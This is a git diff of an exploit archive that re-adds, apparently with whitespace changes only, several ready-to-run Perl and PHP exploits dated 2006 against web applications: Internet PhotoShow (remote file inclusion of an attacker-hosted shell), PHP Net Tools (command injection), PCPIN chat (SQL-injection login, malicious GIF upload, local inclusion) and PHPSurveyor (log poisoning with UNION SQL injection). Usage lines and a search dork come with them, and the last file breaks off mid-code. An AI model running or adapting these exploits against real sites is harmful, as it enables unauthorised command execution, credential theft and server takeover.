@@ -1,83 +1,83 @@ -#!/usr/bin/perl -# -# Exploit by Hessam-x (www.hessamx.net) -# sub usage() -# { - #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n"; - #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd"; - #exit(); - #} -###################################################### -# ___ ___ __ # -# / | \_____ ____ | | __ ___________________ # -#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # -#\ Y // __ \\ \___| <\ ___/| | \// / # -# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ # -# \/ \/ \/ \/ \/ \/ # -# Iran Hackerz Security Team # -# WebSite: www.hackerz.ir # -# DeltaHAcking Team # -# website: www.deltahacking.com # -###################################################### -# Internet PhotoShow Remote File Inclusion Exploit # -###################################################### -# upload a shell with this xpl: -# wget http://shell location/ -use LWP::UserAgent; -print "-------------------------------------------\n"; -print "= Internet PhotoShow =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "-------------------------------------------\n\n"; - - -$bPath = $ARGV[0]; -$cmdo = $ARGV[1]; -$bcmd = $ARGV[2]; - -if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()} - - - -while() -{ - print "Hessam-x@PhotoShow \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n"; - -$res = $xpl->request($req); - -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\n[!] 
Please type a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/) - {print "\n[-] Could Not Connect to cmd Host\n";exit} -elsif ($return =~/^Fatal.error/) {print "\n[-] Invalid Command\n"} - -if($return =~ /(.*)/) - - -{ - $freturn = $1; - $freturn=~ tr/[ê]/[\n]/; - print "\r\n$freturn\n\r"; - last; -} - -else {print "Hessam-x@PhotoShow \$";}}}last; - - -sub usage() - { -print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n"; -print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n"; - exit(); - } - -# milw0rm.com [2006-04-18] +#!/usr/bin/perl +# +# Exploit by Hessam-x (www.hessamx.net) +# sub usage() +# { + #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n"; + #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd"; + #exit(); + #} +###################################################### +# ___ ___ __ # +# / | \_____ ____ | | __ ___________________ # +#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # +#\ Y // __ \\ \___| <\ ___/| | \// / # +# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ # +# \/ \/ \/ \/ \/ \/ # +# Iran Hackerz Security Team # +# WebSite: www.hackerz.ir # +# DeltaHAcking Team # +# website: www.deltahacking.com # +###################################################### +# Internet PhotoShow Remote File Inclusion Exploit # +###################################################### +# upload a shell with this xpl: +# wget http://shell location/ +use LWP::UserAgent; +print "-------------------------------------------\n"; +print "= Internet PhotoShow =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print "-------------------------------------------\n\n"; + + +$bPath = $ARGV[0]; +$cmdo = $ARGV[1]; +$bcmd = $ARGV[2]; + +if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()} + + + +while() +{ + print "Hessam-x@PhotoShow \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = 
HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n"; + +$res = $xpl->request($req); + +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/) + {print "\n[-] Could Not Connect to cmd Host\n";exit} +elsif ($return =~/^Fatal.error/) {print "\n[-] Invalid Command\n"} + +if($return =~ /(.*)/) + + +{ + $freturn = $1; + $freturn=~ tr/[ê]/[\n]/; + print "\r\n$freturn\n\r"; + last; +} + +else {print "Hessam-x@PhotoShow \$";}}}last; + + +sub usage() + { +print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n"; +print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n"; + exit(); + } + +# milw0rm.com [2006-04-18] diff --git a/platforms/php/webapps/1695.pl b/platforms/php/webapps/1695.pl index 94f49c11f..2fb3a310c 100755 --- a/platforms/php/webapps/1695.pl +++ b/platforms/php/webapps/1695.pl 
@@ -1,52 +1,52 @@ -#!/usr/bin/perl -# PHP Net Tools Remote Code Execution Exploit -# -# by FOX_MULDER (fox_mulder@abv.bg) -# Vulnerability found by FOX_MULDER. -# -# "Born to be root !!!" -#----------------------------------+ -#PHP Net Tools | -#Copyright (C) 2005 Eric Robertson | -#h4rdc0d3@gmail.com | -#----------------------------------+ -# -# Fact:Wbyte counted twice to infinity !!! -# -# -################################################### - use LWP 5.64; - - my $hostname = $ARGV[0]; - my $dir = $ARGV[1]; - my $command = $ARGV[2]; - - if (@ARGV<2) { - print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n"; - exit(); - } - - print "=======================================================\n"; - print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n"; - print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n"; - print "fox_mulder@abv.bg\r\n"; - print "=======================================================\n"; - - my $browser = LWP::UserAgent->new; - $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); - print "\n\n[+]Sending request to server . . .\r\n"; - - my $url = "http://$hostname$dir/nettools.php"; - - - my $response = $browser->post( $url,[ - 'ping' => '1', - 'host' => "|$command"]); - - my $code = $response->status_line; - print "[+] HTTP RESPONSE $code\n"; - print "\n[+]Injecting command . . .\n"; - $response->content =~ /blockquote>(.*)<\/blockquote>/s; - print "$1\n"; - -# milw0rm.com [2006-04-18] +#!/usr/bin/perl +# PHP Net Tools Remote Code Execution Exploit +# +# by FOX_MULDER (fox_mulder@abv.bg) +# Vulnerability found by FOX_MULDER. +# +# "Born to be root !!!" +#----------------------------------+ +#PHP Net Tools | +#Copyright (C) 2005 Eric Robertson | +#h4rdc0d3@gmail.com | +#----------------------------------+ +# +# Fact:Wbyte counted twice to infinity !!! 
+# +# +################################################### + use LWP 5.64; + + my $hostname = $ARGV[0]; + my $dir = $ARGV[1]; + my $command = $ARGV[2]; + + if (@ARGV<2) { + print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n"; + exit(); + } + + print "=======================================================\n"; + print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n"; + print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n"; + print "fox_mulder@abv.bg\r\n"; + print "=======================================================\n"; + + my $browser = LWP::UserAgent->new; + $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); + print "\n\n[+]Sending request to server . . .\r\n"; + + my $url = "http://$hostname$dir/nettools.php"; + + + my $response = $browser->post( $url,[ + 'ping' => '1', + 'host' => "|$command"]); + + my $code = $response->status_line; + print "[+] HTTP RESPONSE $code\n"; + print "\n[+]Injecting command . . .\n"; + $response->content =~ /blockquote>(.*)<\/blockquote>/s; + print "$1\n"; + +# milw0rm.com [2006-04-18] diff --git a/platforms/php/webapps/1697.php b/platforms/php/webapps/1697.php index 6221dc06f..6928278ce 100755 --- a/platforms/php/webapps/1697.php +++ b/platforms/php/webapps/1697.php 
@@ -1,266 +1,266 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with magic_quotes_gpc = Off\r\n"; -echo "dork: \"powered by PCPIN.com\"\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to pcpin\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n"; -echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* - software site: http://www.pcpin.com/ - description: a chat software written in php that uses mysql for data storage - - vulnerabilites: - i) sql injection: - you can login as admin typing: - username: ") or isnull(1/0)/* - password: [whatever] - - query becomes: - SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR - (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = "1" - LIMIT 1 - - ii) arbitrary local inclusion: - now you can upload smilies with php code inside, we have a local inclusion - bug in "language" argument when you select a language so, you can include - a gif file and launch commands... 
- - both works with magic_quotes_gpc=Off - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - - -#step 1 -> sql injection, login as admin -echo "[1] login...\r\n"; -$sql="\") or isnull(1/0)/*"; -$sql=urlencode($sql); -$data ="lostpassword="; -$data.="&include=2"; -$data.="&language=english"; -$data.="&submitted=1"; -$data.="&login=".$sql; -$data.="&password=suntzu"; -$packet ="POST ".$p."main.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Accept: text/plain\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[1]); -$cookie=$temp2[0]; -if ($cookie =='') {die("Unable to retrieve session cookie...");} -echo "Cookie -> ".$cookie."\r\n"; -$temp=explode("name=\"session_id\" value=\"",$html); -$temp2=explode("\"",$temp[1]); -$sid=$temp2[0]; -if ($sid =='') 
{die("Unable to retrieve session id...");} -echo "session id -> ".$sid."\r\n"; - -srand(make_seed()); -$v = rand(1,99999); - -#step 2 -> Upload a malicious gif file... -echo "[2] uploading the gif file...\r\n"; -$data='-----------------------------7d613b1d0448 -Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif" -Content-Type: image/gif - - ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="session_id"; - -'.$sid.' ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="include"; - -26 ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="text"; - -suntzu'.$v.' ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="smilie_id" - - ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="add" - -1 ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="edit" - - ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="submitted" - -1 ------------------------------7d613b1d0448-- -'; - - -$packet ="POST ".$p."main.php HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -//echo $html; -$temp=explode("smilies/",$html); //file is renamed, let's retrieve new filename...it is the last in smilies list -$temp2=explode("\"",$temp[count($temp)-1]); -$fn=$temp2[0]; -if ($fn =='') {die("Unable to retrieve evil gif filename...");} -echo "filename -> ".$fn."\r\n"; - -#step 3-> logout... 
you need this to launch again exploit -echo "[3] logout...\r\n"; -$data="session_id=".$sid."&include=9"; -$packet ="POST ".$p."main.php HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"window.location.href")) {echo "done...\r\n";} - else {echo "maybe not...\r\n";} - -#step 4-> launch commands -echo "[4] sending command...\r\n"; -$xpl=urlencode("../images/smilies/".$fn.chr(0x00)); -$data="language=".$xpl; -$packet ="POST ".$p."main.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Cookie: suntzu=".$cmd.";\r\n"; //pass commands through cookies -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - if (strstr($html,"56789")) - { - echo "Exploit succeeded...\r\n\r\n"; - $temp=explode("56789",$html); - die($temp[1]); - } -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-19] +#!/usr/bin/php -q -d short_open_tag=on + works with magic_quotes_gpc = Off\r\n"; +echo "dork: \"powered by PCPIN.com\"\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to pcpin\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n"; +echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n"; +echo "php ".$argv[0]." 
localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* + software site: http://www.pcpin.com/ + description: a chat software written in php that uses mysql for data storage + + vulnerabilites: + i) sql injection: + you can login as admin typing: + username: ") or isnull(1/0)/* + password: [whatever] + + query becomes: + SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR + (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = "1" + LIMIT 1 + + ii) arbitrary local inclusion: + now you can upload smilies with php code inside, we have a local inclusion + bug in "language" argument when you select a language so, you can include + a gif file and launch commands... + + both works with magic_quotes_gpc=Off + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + + +#step 1 -> sql injection, login as admin +echo "[1] login...\r\n"; +$sql="\") or isnull(1/0)/*"; +$sql=urlencode($sql); +$data ="lostpassword="; +$data.="&include=2"; +$data.="&language=english"; +$data.="&submitted=1"; +$data.="&login=".$sql; +$data.="&password=suntzu"; +$packet ="POST ".$p."main.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Accept: text/plain\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(" ",$temp[1]); +$cookie=$temp2[0]; +if ($cookie =='') {die("Unable to retrieve session cookie...");} +echo "Cookie -> ".$cookie."\r\n"; +$temp=explode("name=\"session_id\" value=\"",$html); +$temp2=explode("\"",$temp[1]); +$sid=$temp2[0]; +if ($sid =='') 
{die("Unable to retrieve session id...");} +echo "session id -> ".$sid."\r\n"; + +srand(make_seed()); +$v = rand(1,99999); + +#step 2 -> Upload a malicious gif file... +echo "[2] uploading the gif file...\r\n"; +$data='-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif" +Content-Type: image/gif + + +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="session_id"; + +'.$sid.' +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="include"; + +26 +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="text"; + +suntzu'.$v.' +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="smilie_id" + + +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="add" + +1 +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="edit" + + +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="submitted" + +1 +-----------------------------7d613b1d0448-- +'; + + +$packet ="POST ".$p."main.php HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cookie: ".$cookie."\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +//echo $html; +$temp=explode("smilies/",$html); //file is renamed, let's retrieve new filename...it is the last in smilies list +$temp2=explode("\"",$temp[count($temp)-1]); +$fn=$temp2[0]; +if ($fn =='') {die("Unable to retrieve evil gif filename...");} +echo "filename -> ".$fn."\r\n"; + +#step 3-> logout... 
you need this to launch again exploit +echo "[3] logout...\r\n"; +$data="session_id=".$sid."&include=9"; +$packet ="POST ".$p."main.php HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cookie: ".$cookie."\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"window.location.href")) {echo "done...\r\n";} + else {echo "maybe not...\r\n";} + +#step 4-> launch commands +echo "[4] sending command...\r\n"; +$xpl=urlencode("../images/smilies/".$fn.chr(0x00)); +$data="language=".$xpl; +$packet ="POST ".$p."main.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Cookie: suntzu=".$cmd.";\r\n"; //pass commands through cookies +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + if (strstr($html,"56789")) + { + echo "Exploit succeeded...\r\n\r\n"; + $temp=explode("56789",$html); + die($temp[1]); + } +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-19] diff --git a/platforms/php/webapps/1701.php b/platforms/php/webapps/1701.php index 55bbfaa12..626e3ab22 100755 --- a/platforms/php/webapps/1701.php +++ b/platforms/php/webapps/1701.php 
@@ -1,207 +1,207 @@ -#!/usr/bin/php -q -d short_open_tag=on - works regardless of magic_quotes gpc settings *\r\n"; -echo "* with at least one row in 'surveys' table *\r\n"; -echo "* and if we succeed to include logs *\r\n"; -echo "********************************************************************\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHPSurveyor\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /surveyor/ cat config.php\r\n"; -echo "php ".$argv[0]." localhost /surveyor/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files ...\r\n\r\n"; -$CODE=""; -$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; -$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -sendpacketii($packet); -sleep(3); - -//fill with possible locations... 
-$paths=array( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../../../../../../apache/logs/error.log", -"../../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../../logs/error.log", -"../../../../../../logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", -"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", 
-"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); - - -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; - -//bypassing magic_quotes=On encoding paths with CHAR() MySQL func -$mysql_encoded="CHAR("; - for ($j=0; $j<=strlen($paths[$i])-1; $j++) - { - $mysql_encoded.=ord($paths[$i][$j]); - if ($j==strlen($paths[$i])-1) - {$mysql_encoded.=",0)";} //a null char to break inclusion path, encoded as CHAR(0) - else - {$mysql_encoded.=",";} - } - -$SQL="999 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,".$mysql_encoded.",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM surveys"; -echo "[".$a."] Trying with -> - ".$SQL." - for \"surveyd\" argument\r\n\r\n"; -$SQL=urlencode($SQL); -$packet ="GET ".$p."save.php HTTP/1.0\r\n"; -$packet.="User-Agent: GoogleBot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: surveyid=$SQL; cmd=".$cmd.";\r\n"; //let's poison the thissurvey['language'] value, thorugh cookies, log this :) -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"56789")) - { - echo "Exploit succeeded...\r\n"; - $temp=explode("56789",$html); - die($temp[1]); - } -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-20] +#!/usr/bin/php -q -d short_open_tag=on + works regardless of magic_quotes gpc settings *\r\n"; +echo "* with at least one row in 'surveys' table *\r\n"; +echo "* and if we succeed to include logs *\r\n"; +echo "********************************************************************\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." 
